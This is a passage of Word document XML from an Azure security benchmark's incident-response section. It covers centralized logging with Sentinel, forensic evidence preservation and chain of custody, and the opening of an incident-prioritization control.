        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Enable comprehensive forensic investigation through centralized logging:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC7647F" w14:textId="5697A0EE" w:rsidR="00645387" w:rsidRPr="00645387" w:rsidRDefault="00645387" w:rsidP="00FB3909">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Implement comprehensive log collection across Azure services and workloads with centralized analysis through Azure Monitor, Microsoft Sentinel, and Azure Log Analytics for effective investigation and forensics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F3C25D" w14:textId="15C05CD9" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="224"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Azure log collection strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685D48F5" w14:textId="7B483613" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Microsoft Entra ID audit and sign-in logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77725198" w14:textId="4802A673" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="419"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Complete authentication and authorization logging with risk analysis, conditional access policy evaluation, and privileged operation tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445F7B3E" w14:textId="7DA0B366" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Azure Activity Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FFA605" w14:textId="646E54B9" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="419"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t xml:space="preserve">Comprehensive </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D9595A">
        <w:t>control</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D9595A">
        <w:t xml:space="preserve"> plane operations including resource modifications, policy changes, and administrative activities across all Azure services (Azure Activity log).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6C690C" w14:textId="3F74BAE0" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Network Security Group Flow Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5694FCBA" w14:textId="3ABA66C2" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="419"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Network traffic analysis with source/destination mapping, protocol analysis, and connection pattern identification for lateral movement detection (NSG flow logs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073FF8E0" w14:textId="03278885" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Azure Monitor Agent Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A76B63B" w14:textId="73B308D4" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="419"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Systematic deployment of Azure Monitor Agent across all VMs and virtual machine scale sets for comprehensive system-level logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E85382" w14:textId="28369F72" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Application and Service Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1CDA6B" w14:textId="4B40DD78" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="419"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Custom application logging with structured formats, correlation IDs, and security event categorization for business logic investigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6419A499" w14:textId="05A04BD5" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Microsoft Defender XDR data integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464B58A9" w14:textId="17C0A47F" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="419"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t xml:space="preserve">Automatic collection of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D9595A">
        <w:t>endpoint</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D9595A">
        <w:t>, identity, email, and cloud app signals from Microsoft 365 environment for unified threat correlation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671567F4" w14:textId="5327EFB9" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="224"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Microsoft Sentinel investigation capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FA7533" w14:textId="0EA5F73D" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Entity behavior analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE1FE7B" w14:textId="77777777" w:rsidR="00FB3909" w:rsidRPr="00FB3909" w:rsidRDefault="00FB3909" w:rsidP="00FB3909">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="419"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB3909">
        <w:t>AI-powered analysis of user and entity behavior with anomaly detection and risk scoring for investigation prioritization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25810315" w14:textId="58B5B20B" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:lastRenderedPageBreak/>
        <w:t>Investigation Graph</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B973A0B" w14:textId="7D8473CC" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Visual investigation interface showing entity relationships, attack timelines, and evidence correlation for comprehensive incident analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EE3ED8" w14:textId="17361C1A" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Threat Hunting Workbooks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B38520" w14:textId="70CD9709" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Pre-built workbooks for systematic threat hunting with KQL queries, visualizations, and investigation workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10051F3A" w14:textId="6228BD62" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>MITRE ATT&amp;CK Framework Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A310A08" w14:textId="3B8AF8C4" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Automatic mapping of detected activities to MITRE ATT&amp;CK techniques for attack pattern recognition and defense gap analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB6F431" w14:textId="65E26F59" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Cross-Workspace Investigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5110DF44" w14:textId="3FB22D2B" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Investigation capabilities across multiple Log Analytics workspaces for large-scale enterprise environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7B1EE2" w14:textId="72DB492D" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00D9595A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>IR-4.2: Establish evidence preservation and forensic capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6599B7C0" w14:textId="02ACC593" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Evidence collection automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4161D1C1" w14:textId="45C78953" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Azure VM snapshot automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706F40EA" w14:textId="51B7F6EA" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>PowerShell and ARM template automation for creating point-in-time VM snapshots during incident response with metadata tagging and retention policies (Create a snapshot).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D879130" w14:textId="2DEFE1AC" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Azure Disk Backup Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40684B44" w14:textId="2C486672" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Automated backup triggering during incidents with legal hold policies and long-term retention in Azure Backup vaults (Azure Backup overview).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B336FE" w14:textId="52523428" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Memory Dump Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CD5C1A" w14:textId="4C3B74BB" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Systematic memory dump collection using Azure extensions and PowerShell remoting for volatile evidence preservation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5777DD31" w14:textId="5826875A" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Log Export and Preservation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBA63D8" w14:textId="28E8BFF5" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Automated export of Azure Monitor logs, Microsoft Entra ID logs, and security event logs to immutable Azure Storage with legal hold policies (Immutable storage for blobs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EB5E32" w14:textId="7B62A5D8" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Network packet capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0A2A94" w14:textId="72A5F7EC" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t xml:space="preserve">Azure Network Watcher packet </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D9595A">
        <w:t>capture</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D9595A">
        <w:t xml:space="preserve"> automation triggered by security incidents for network forensic analysis (Packet capture).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2CA41C" w14:textId="4D266C86" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="226"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Forensic analysis tools integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB60AF4" w14:textId="0F86588C" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Microsoft Defender for Cloud integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69309049" w14:textId="77777777" w:rsidR="00FB3909" w:rsidRPr="00FB3909" w:rsidRDefault="00FB3909" w:rsidP="00FB3909">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="421"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB3909">
        <w:t>Automated evidence collection triggered by high-severity alerts with correlation to investigation timelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505412B9" w14:textId="5677FF2D" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Third-Party Forensic Tool Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C20171D" w14:textId="24A050BD" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="422"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:lastRenderedPageBreak/>
        <w:t>Integration with third-party forensic tools through Azure Storage mounting and secure evidence transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6013689F" w14:textId="5170478F" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Chain of Custody Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3E9BC0" w14:textId="6913A811" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="422"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Automated chain of custody documentation with cryptographic hashing, digital signatures, and access logging for legal evidence requirement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C49B2E" w14:textId="0EC68DB4" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Evidence Retention Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F287993" w14:textId="4ECC6B45" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="422"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Automated retention policy enforcement with compliance requirements for different incident types and regulatory frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009D1B95" w14:textId="7118A04C" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Cross-Region Evidence Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DE1434" w14:textId="19DF475B" w:rsidR="00B86A9F" w:rsidRDefault="00D9595A" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="422"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Geographic evidence replication for disaster recovery and jurisdictional requirements with encryption and access controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BF7707" w14:textId="3F55A576" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="00B86A9F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc242449540"/>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>IR-5: Detection and analysis - prioritize incidents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="0A8248D4" w14:textId="122AA23D" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1414BD" w14:textId="6EB727FD" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Implement systematic incident prioritization based on asset criticality, business impact, threat severity, and regulatory requirements using automated scoring and classification to ensure appropriate resource allocation and response timing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D9F9D7" w14:textId="06FE095C" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="243C1BA0" w14:textId="6EC6941C" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Delayed critical threat response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBE4C2C" w14:textId="5BAA1304" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="00A43D97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>High-impact incidents receive inadequate attention while resources focus on lower-priority events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B9289B" w14:textId="45039103" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t xml:space="preserve">Resource exhaustion </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B86A9F">
        <w:t xml:space="preserve"> low-priority events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FC2A17" w14:textId="280368ED" w:rsidR="00B86A9F" w:rsidRDefault="00B86A9F" w:rsidP="001423AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B86A9F">
        <w:t>Teams investigate minor incidents while sophisticated attacks progress in high-value systems</w:t>
      </w:r>
    </w:p>
